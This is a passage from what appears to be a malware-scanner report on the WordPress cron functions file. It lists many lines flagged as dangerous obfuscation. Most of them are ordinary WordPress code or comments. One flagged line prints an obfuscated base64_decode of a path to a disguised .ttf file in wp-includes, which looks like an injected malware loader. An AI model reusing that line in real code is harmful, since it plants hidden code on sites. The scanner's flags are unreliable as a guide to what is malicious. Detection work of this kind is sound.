</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_set_cron_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$crons</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"L3Zhci93d3cvYmFydG9saW5pL2JhcnRvbGluaS5jb20udWEvd3AtaW5jbHVkZXMvVGV4dC9EaWZmL0VuZ2luZS9zbnFzcW5ub3Nzb25uLnR0Zg=="</span><span style="color: #007700">);</span><span style="color: #0000BB">?><?php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">/</span><span style="color: #0000BB">wp_schedule_event</span><span style="color: #007700">/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_schedule_event</span><span style="color: #007700">( </span><span style="color: #0000BB">$timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">$recurrence</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">value modified to boolean indicating success </span><span style="color: #007700">or </span><span style="color: #0000BB">failure</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">/</span><span style="color: #0000BB">wp_schedule_single_event</span><span style="color: #007700">/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">|</span><span style="color: #0000BB">WP_Error True </span><span style="color: #007700">if </span><span style="color: #0000BB">event successfully rescheduled</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">or </span><span style="color: #0000BB">WP_Error on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function. </span><span style="color: #0000BB">Each value in the </span><span style="color: #007700">array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_reschedule_event</span><span style="color: #007700">( </span><span style="color: #0000BB">$timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">$recurrence</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">a WP_Error on failure</span><span style="color: #007700">. Default </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">|</span><span style="color: #0000BB">WP_Error True </span><span style="color: #007700">if </span><span style="color: #0000BB">event successfully scheduled</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">or </span><span style="color: #0000BB">WP_Error on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a non</span><span style="color: #007700">-</span><span style="color: #0000BB">null value will short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit the normal rescheduling</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true </span><span style="color: #007700">if </span><span style="color: #0000BB">the event was successfully</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_schedule_single_event</span><span style="color: #007700">( </span><span style="color: #0000BB">$timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_schedule_event</span><span style="color: #007700">( </span><span style="color: #0000BB">$timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">$recurrence</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return new </span><span style="color: #0000BB">WP_Error</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">|</span><span style="color: #0000BB">WP_Error True </span><span style="color: #007700">if </span><span style="color: #0000BB">event successfully unscheduled</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">or </span><span style="color: #0000BB">WP_Error on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_unschedule_event</span><span style="color: #007700">( </span><span style="color: #0000BB">$timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a non</span><span style="color: #007700">-</span><span style="color: #0000BB">null value will short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit the normal unscheduling</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">instead</span><span style="color: #007700">. Default </span><span style="color: #0000BB">null to </span><span style="color: #007700">continue </span><span style="color: #0000BB">unscheduling the event</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">may </span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false</span><span style="color: #007700">, </span><span style="color: #0000BB">but may also </span><span style="color: #007700">return </span><span style="color: #0000BB">a non</span><span style="color: #007700">-</span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 532</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value of this </span><span style="color: #007700">function.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 535</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">value modified to indicate success </span><span style="color: #007700">or </span><span style="color: #0000BB">failure</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 545</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false</span><span style="color: #007700">|</span><span style="color: #0000BB">WP_Error On success an integer indicating number of events unscheduled </span><span style="color: #007700">(</span><span style="color: #0000BB">0 indicates no</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 549</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_clear_scheduled_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 552</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">took the arguments </span><span style="color: #007700">as </span><span style="color: #0000BB">discrete vars rather than an </span><span style="color: #007700">array </span><span style="color: #0000BB">like the rest of the API</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 556</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 558</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #DD0000">' )</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FunctionUse</span><span style="color: #007700">.</span><span style="color: #0000BB">ArgumentFunctionsReportCurrentValue</span><span style="color: #007700">.</span><span style="color: #0000BB">NeedsInspection</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the number of events successfully</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns the same schedule in an infinite loop</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 607</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$error</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a non</span><span style="color: #007700">-</span><span style="color: #0000BB">null value will short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit adding the event to the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 632</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">count</span><span style="color: #007700">( </span><span style="color: #0000BB">$results </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to </span><span style="color: #007700">return </span><span style="color: #0000BB">the filtered value instead</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 646</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">value added to indicate success </span><span style="color: #007700">or </span><span style="color: #0000BB">failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 654</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_unschedule_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">either a WP_Error object </span><span style="color: #007700">or </span><span style="color: #0000BB">false depending</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 669</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">instead</span><span style="color: #007700">. Default </span><span style="color: #0000BB">null to </span><span style="color: #007700">continue </span><span style="color: #0000BB">unscheduling the hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_sum</span><span style="color: #007700">( </span><span style="color: #0000BB">$results </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 723</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$set</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 740</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">. Default </span><span style="color: #0000BB">null</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 741</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">object</span><span style="color: #007700">|</span><span style="color: #0000BB">false </span><span style="color: #007700">{</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">true </span><span style="color: #007700">if </span><span style="color: #0000BB">the event was scheduled</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">or </span><span style="color: #0000BB">a WP_Error </span><span style="color: #007700">if </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_scheduled_event</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$timestamp </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a non</span><span style="color: #007700">-</span><span style="color: #0000BB">null value will short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit the normal process</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 756</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning the filtered value instead</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 758</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">the event does not exist</span><span style="color: #007700">, </span><span style="color: #0000BB">otherwise an event object</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">instead</span><span style="color: #007700">. Default </span><span style="color: #0000BB">null to </span><span style="color: #007700">continue </span><span style="color: #0000BB">retrieving the event</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">instead</span><span style="color: #007700">. Default </span><span style="color: #0000BB">null</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
